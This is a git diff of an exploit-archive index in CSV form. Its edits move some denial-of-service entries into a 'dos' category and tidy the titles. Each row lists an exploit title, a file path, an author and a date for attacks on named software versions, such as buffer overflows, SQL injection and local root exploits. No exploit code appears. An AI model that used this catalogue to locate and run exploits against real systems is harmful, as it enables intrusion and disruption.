diff --git a/files.csv b/files.csv index d2c3a02c1..b50c75fab 100755 --- a/files.csv +++ b/files.csv @@ -567,7 +567,7 @@ id,file,description,date,author,platform,type,port 734,platforms/windows/remote/734.c,"Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 - Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000 737,platforms/php/webapps/737.txt,"QWikiwiki Directory Traversal Vulnerability",2005-01-04,Madelman,php,webapps,0 -738,platforms/php/webapps/738.c,"iWebNegar Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,webapps,0 +738,platforms/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,dos,0 739,platforms/bsd/local/739.c,"FreeBSD TOP Format String Vulnerability",2001-07-23,truefinder,bsd,local,0 740,platforms/php/webapps/740.pl,"phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0 741,platforms/linux/local/741.pl,"HTGET <= 0.9.x - Local Root Exploit",2005-01-05,nekd0,linux,local,0 @@ -639,7 +639,7 @@ id,file,description,date,author,platform,type,port 814,platforms/php/webapps/814.txt,"MercuryBoard <= 1.1.1 Working SQL Injection",2005-02-12,Zeelock,php,webapps,0 815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 816,platforms/linux/local/816.c,"GNU a2ps _Anything to PostScript_ Local Exploit (not suid)",2005-02-13,lizard,linux,local,0 -817,platforms/cgi/webapps/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,webapps,0 +817,platforms/cgi/dos/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 818,platforms/php/webapps/818.txt,"vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution",2005-02-14,AL3NDALEEB,php,webapps,0 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution (part 2)",2005-02-15,AL3NDALEEB,php,webapps,0 @@ -870,8 +870,8 @@ id,file,description,date,author,platform,type,port 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 1061,platforms/php/webapps/1061.pl,"Mambo <= 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 -1063,platforms/php/webapps/1063.pl,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code)",2005-06-22,g30rg3_x,php,webapps,0 -1064,platforms/php/webapps/1064.c,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code)",2005-06-22,HaCkZaTaN,php,webapps,0 +1063,platforms/php/dos/1063.pl,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl Code)",2005-06-22,g30rg3_x,php,dos,0 +1064,platforms/php/dos/1064.c,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C Code)",2005-06-22,HaCkZaTaN,php,dos,0 1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0 @@ -956,7 +956,7 @@ id,file,description,date,author,platform,type,port 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit",2005-08-12,"Pierre Kroma",hardware,dos,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 DoS Exploit",2005-08-17,"Luigi Auriemma",windows,dos,0 -1157,platforms/cgi/webapps/1157.pl,"GTChat <= 0.95 Alpha Remote Denial of Service Exploit",2005-08-18,RusH,cgi,webapps,0 +1157,platforms/cgi/dos/1157.pl,"GTChat <= 0.95 Alpha - Remote Denial of Service Exploit",2005-08-18,RusH,cgi,dos,0 1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 @@ -973,14 +973,14 @@ id,file,description,date,author,platform,type,port 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-08-22,Alpha_Programmer,php,webapps,0 1173,platforms/windows/local/1173.c,"Mercora IMRadio <= 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 1174,platforms/windows/local/1174.c,"ZipTorrent <= 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 -1175,platforms/cgi/webapps/1175.pl,"GTChat <= 0.95 Alpha (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,webapps,0 +1175,platforms/cgi/dos/1175.pl,"GTChat <= 0.95 Alpha - (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,dos,0 1176,platforms/multiple/dos/1176.c,"Ventrilo <= 2.3.0 - Remote Denial of Service Exploit (all platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 1178,platforms/windows/remote/1178.c,"Microsoft Windows IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (French Fix)",2005-08-25,"Fabrice Mourron",windows,remote,445 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 - UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0 -1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0 +1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-08-30,basher13,windows,remote,80 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 - Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 - (-lib) Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0 @@ -1118,7 +1118,7 @@ id,file,description,date,author,platform,type,port 1341,platforms/windows/dos/1341.c,"Microsoft Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 -1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0 +1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 @@ -1257,7 +1257,7 @@ id,file,description,date,author,platform,type,port 1514,platforms/asp/webapps/1514.pl,"MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0 -1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0 +1517,platforms/php/dos/1517.c,"PunBB <= 2.0.10 - (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,dos,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0 1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow Exploit (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 @@ -1312,7 +1312,7 @@ id,file,description,date,author,platform,type,port 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution Vulnerability",2006-03-09,Hessam-x,php,webapps,0 1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0 -1573,platforms/php/webapps/1573.php,"Guppy <= 4.5.11 (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,webapps,0 +1573,platforms/php/dos/1573.php,"Guppy <= 4.5.11 - (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,dos,0 1574,platforms/linux/remote/1574.c,"PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit",2006-03-11,prdelka,linux,remote,7144 1575,platforms/php/webapps/1575.pl,"GuestBook Script <= 1.7 (include_files) Remote Code Execution Exploit",2006-03-11,rgod,php,webapps,0 1576,platforms/php/webapps/1576.txt,"Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 @@ -1382,7 +1382,7 @@ id,file,description,date,author,platform,type,port 1646,platforms/php/webapps/1646.php,"phpMyChat <= 0.14.5 (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev (SYS enter) Remote Code Execution Exploit",2006-04-06,rgod,php,webapps,0 1650,platforms/php/webapps/1650.pl,"Horde Help Viewer <= 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0 -1651,platforms/php/webapps/1651.php,"ADODB < 4.70 (tmssql.php) Denial of Service Vulnerability",2006-04-09,rgod,php,webapps,0 +1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service Vulnerability",2006-04-09,rgod,php,dos,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection Exploit",2006-04-09,rgod,php,webapps,0 1653,platforms/php/webapps/1653.txt,"dnGuestbook <= 2.0 - Remote SQL Injection Vulnerabilities",2006-04-09,snatcher,php,webapps,0 1654,platforms/php/webapps/1654.txt,"autonomous lan party <= 0.98.1.0 - Remote File Inclusion Vulnerability",2006-04-09,Codexploder,php,webapps,0 @@ -1418,7 +1418,7 @@ id,file,description,date,author,platform,type,port 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 -1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 +1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure & Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion Vulnerability",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 @@ -1709,7 +1709,7 @@ id,file,description,date,author,platform,type,port 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability",2006-07-10,"naveed afzal",windows,dos,0 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0 2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 (gore.php) Remote File Inclusion Vulnerability",2006-07-10,SHiKaA,php,webapps,0 -2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 +2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0 2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0 2007,platforms/php/webapps/2007.php,"phpBB 3 (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0 @@ -2429,7 +2429,7 @@ id,file,description,date,author,platform,type,port 2739,platforms/php/webapps/2739.txt,"iPrimal Forums (admin/index.php) Remote File Include Vulnerability",2006-11-08,Bl0od3r,php,webapps,0 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include Vulnerability",2006-11-08,DeltahackingTEAM,php,webapps,0 -2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability",2006-11-08,"Cold Zero",php,webapps,0 +2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 - (dodosmail.php) Remote File Include Vulnerability",2006-11-08,"Cold Zero",php,webapps,0 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit",2006-11-08,N/A,windows,remote,0 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0 2745,platforms/php/webapps/2745.txt,"gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0 @@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port 2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure Vulnerability",2006-11-16,"Craig Heffner",php,webapps,0 2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0 -2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 (textview.php) Information Disclosure Vulnerability",2006-11-17,"Craig Heffner",php,webapps,0 +2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - (textview.php) Information Disclosure Vulnerability",2006-11-17,"Craig Heffner",php,webapps,0 2796,platforms/php/webapps/2796.php,"miniCWB <= 1.0.0 (contact.php) Local File Include Exploit",2006-11-17,Kacper,php,webapps,0 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0 @@ -2890,7 +2890,7 @@ id,file,description,date,author,platform,type,port 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation Exploit",2007-01-29,"Andres Tarasco",windows,local,0 3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability",2007-01-29,GoLd_M,php,webapps,0 -3223,platforms/cgi/webapps/3223.pl,"CVSTrac 2.0.0 Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,webapps,0 +3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec <= 3.0 (zd_numer.php) Local File Include Exploit",2007-01-30,ajann,php,webapps,0 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability",2007-01-30,ajann,php,webapps,0 @@ -5701,7 +5701,7 @@ id,file,description,date,author,platform,type,port 6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register Remote SQL Injection Vulnerability",2008-07-16,His0k4,php,webapps,0 6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-07-16,Mr.SQL,php,webapps,0 -6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector Code Execution / Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 +6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL Injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability",2008-07-17,"Hussin X",php,webapps,0 @@ -6053,7 +6053,7 @@ id,file,description,date,author,platform,type,port 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration CSRF Command Execution Exploit (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 6478,platforms/php/webapps/6478.txt,"Technote 7 (shop_this_skin_path) Remote File Inclusion Vulnerability",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"x10media mp3 - search engine 1.5.5 - Remote File Inclusion Vulnerability",2008-09-17,THUNDER,php,webapps,0 -6481,platforms/php/webapps/6481.c,"Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,webapps,0 +6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,dos,0 6482,platforms/php/webapps/6482.txt,"addalink <= 4 Write Approved Links Remote Vulnerability",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-Php CMS (article.php es_id) Remote SQL Injection Vulnerability",2008-09-18,HaCkeR_EgY,php,webapps,0 6485,platforms/php/webapps/6485.txt,"addalink <= 4 (category_id) Remote SQL Injection Vulnerability",2008-09-18,ka0x,php,webapps,0 @@ -6169,7 +6169,7 @@ id,file,description,date,author,platform,type,port 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro <= 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 6598,platforms/php/webapps/6598.txt,"CoAST 0.95 (sections_file) Remote File Inclusion Vulnerability",2008-09-27,DaRkLiFe,php,webapps,0 6599,platforms/php/webapps/6599.txt,"Real Estate Manager (cat_id) Remote SQL Injection Vulnerability",2008-09-27,CraCkEr,php,webapps,0 -6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 File Execution / IE DoS Exploit",2008-09-27,e.wiZz!,windows,remote,0 +6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE DoS Exploit",2008-09-27,e.wiZz!,windows,remote,0 6601,platforms/php/webapps/6601.txt,"LnBlog <= 0.9.0 (plugin) Local File Inclusion Vulnerability",2008-09-27,dun,php,webapps,0 6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 (index.php navi) Local File Inclusion Vulnerability",2008-09-27,dun,php,webapps,0 6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 (gallery.php id) Remote SQL Injection Vulnerability",2008-09-27,r45c4l,php,webapps,0 @@ -7080,7 +7080,7 @@ id,file,description,date,author,platform,type,port 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B (image_upload.php) Arbitrary File Upload Vulnerability",2008-12-21,Piker,php,webapps,0 7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0 -7540,platforms/php/webapps/7540.txt,"phpg 1.6 (xss/pd/dos) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 +7540,platforms/php/webapps/7540.txt,"phpg 1.6 - (XSS/Path Disclosure/DoS) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0 7541,platforms/php/webapps/7541.pl,"RSS Simple News (news.php pid) Remote SQL Injection Exploit",2008-12-22,Piker,php,webapps,0 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - (filename) File Disclosure Vulnerability",2008-12-22,SirGod,php,webapps,0 7543,platforms/php/webapps/7543.txt,"Wordpress Plugin Page Flip Image Gallery <= 0.2.2 - Remote FD Vuln",2008-12-22,GoLd_M,php,webapps,0 @@ -7373,7 +7373,7 @@ id,file,description,date,author,platform,type,port 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - (id) SQL Injection Vulnerability",2009-01-20,snakespc,php,webapps,0 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution Exploit",2009-01-20,Osirys,php,webapps,0 -7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability",2009-01-20,Stack,php,webapps,0 +7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion Vulnerability",2009-01-20,Stack,php,webapps,0 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit",2009-01-20,His0k4,windows,local,0 7840,platforms/php/webapps/7840.pl,"Joomla Com BazaarBuilder Shopping Cart 5.0 - SQL Injection Exploit",2009-01-21,XaDoS,php,webapps,0 7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability",2009-01-21,"Br1ght D@rk",php,webapps,0 @@ -9220,7 +9220,7 @@ id,file,description,date,author,platform,type,port 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection and xss",2009-09-23,"Alexey Sintsov",php,webapps,0 9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 -9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation",2009-09-23,Evilcry,windows,local,0 +9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 - DoS and Privilege Escalation",2009-09-23,Evilcry,windows,local,0 9832,platforms/php/webapps/9832.txt,"Joomla/Mambo Tupinambis SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 9833,platforms/php/webapps/9833.txt,"Joomla com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 @@ -9234,7 +9234,7 @@ id,file,description,date,author,platform,type,port 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0 -9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0 +9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 @@ -9254,10 +9254,10 @@ id,file,description,date,author,platform,type,port 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7-9 - U3D BoF",2009-10-27,"Felipe Andres Manzano",windows,local,0 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 BoF",2009-10-29,Dr_IDE,windows,local,0 9867,platforms/php/webapps/9867.txt,"Amiro.CMS <= 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 -9871,platforms/windows/local/9871.txt,"Boloto Media Player 1.0.0.9 pls file DoS",2009-10-27,Dr_IDE,windows,local,0 +9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file DoS",2009-10-27,Dr_IDE,windows,dos,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 9873,platforms/windows/webapps/9873.txt,"Cherokee <= 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 -9874,platforms/windows/webapps/9874.txt,"Cherokee Web server 0.5.4 DoS",2009-10-26,"Usman Saeed",windows,webapps,0 +9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - DoS",2009-10-26,"Usman Saeed",windows,dos,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0 9877,platforms/asp/webapps/9877.txt,"DWebPro command injection",2009-10-17,"Rafael Sousa",asp,webapps,0 @@ -9354,13 +9354,13 @@ id,file,description,date,author,platform,type,port 